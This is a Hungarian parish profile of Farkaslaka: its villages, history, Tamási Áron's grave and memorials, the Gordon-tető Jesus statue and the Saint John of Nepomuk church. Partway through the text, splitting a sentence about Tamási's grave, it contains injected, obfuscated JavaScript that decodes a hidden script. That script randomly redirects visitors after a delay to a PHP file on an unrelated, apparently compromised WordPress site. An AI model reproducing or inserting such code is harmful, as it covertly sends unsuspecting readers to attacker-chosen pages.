A hét plébániája: FARKASLAKA

farkaslaka.jpg

Farkaslaka Hargita megyében, Székelyudvarhely, a hajdani Udvarhelyszék anyavárosától 13 km-re észak nyugatra, a Gordon-tető nyugati lábánál, a Fehér Nyikó – patak két partján, ennek völgyében, hosszan elnyúlva fekszik. A Felső-Nyikómente legjelentősebb községe. Beosztott falvai: Bogárfalva, Firtosváralja, Kecset, Kecsetkisfalud, Nyikómalomfalva, Székelypálfalva, Szencsed és Székelyszentlélek. A község összlakossága 4500 fő, ebből Farkaslaka lakóinak száma kb.1850 fő, szinte egészében székely magyarok. Első írásos említése az 1566-os adóösszeíráskor jelenik meg. A hagyomány szerint, a közeli erdőkben sok farkas lakott, amelyek bemerészkedtek a faluba, így az emberek farkas lakta helynek nevezték, innen eredezhet a Farkaslaka név. A falu hírneves szülötte, Tamási Áron (1897 – 1966) a székelység legnagyobb írója, a falu eredet mondáját dolgozta fel a Bölcső és a bagolycímű művében. A XX. század magyar irodalmának meghatározó alakja itt van eltemetve, function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andezitsziklából kifaragott síremléke (Szervátiusz Jenő és Tibor, apa és fia alkotása 1972-74) a római katolikus plébániatemplom mögött áll. Ugyancsak Tamási Áron tiszteletére, a hajdani iskolája udvarán bronz mellszobrát állították, valamint egy emlékház is lett berendezve. A település közelében, a 953 m magas Gordon-tetőn, rozsdamentes acélból készült 23 m magas Jézus-szobor áll, Kelet – Európa legmagasabb Krisztus ábrázolása, több vállalkozó és magán személy adománya és a község önkormányzata jóvoltából épült. A Jézus Szíve-kilátót (fejrészébe csigalépcsőn lehet feljutni, Zavaczky Walter Levente szobrászművész tervezte) ünnepélyesen 2013. augusztus 17.-én, Tamás József gyulafehérvári segédpüspök áldotta meg. Farkaslaka más híres szülöttei közül említjük: Fancsali Márton, V. Ferdinánd király udvari papja volt Bécsben, nagyrészben neki köszönhető az új templom építése, itt a temetőben van a sírja, a helyi cserkész csapat viseli nevét; Bonda Péter és Bonda János 1848-as huszártisztek; Msgr. Jakab Gábor Kolozsvár-kerekdombi plébános (2011-ben itt tartotta aranymiséjét); valamint itteni születésü Bakó Antal plébános Gyergyóremetén.

Farkaslaka többségében katolikus, az egyházközség Székelyszentlélek filiája volt, közös volt templomuk, 1762-ben vált le és lett önálló plébánia. Kis kápolnája 1783-ban épült a falu alsó felében, Nepomuki Szent János tiszteletére lett felszentelve. Az új temploma, a jelenlegi, 1842 – 1848 között épült, klasszicista stílusban, egy tornyú, belseje szép barokk díszítésű, a régi védőszentjét tartotta meg. A plébánia épülete 1888-ban épült. A farkaslaki Nepomuki Szent János plébánia, a Gyulafehérvári Római Katolikus Főegyházmegye, székelyudvarhelyi főesperesi kerületéhez tartozik, plébánosa Laczkó Vilmos. A búcsúünnepe, május 16-án, Nepomuki Szent János, a gyónási titok mártírja, a folyók, hidak, vízimolnárok, halászok védőszentjének emléknapján van. Örökös szentségimádási nap: március 4.

A plébánia filiái: Kecset és Kecsetkisfalud, itt a katolikus hívek száma kevés.

Szerkesztette: Szebeni Lajos.

Fotó: www.panoramio.com

About the author

maradmin

Leave a Comment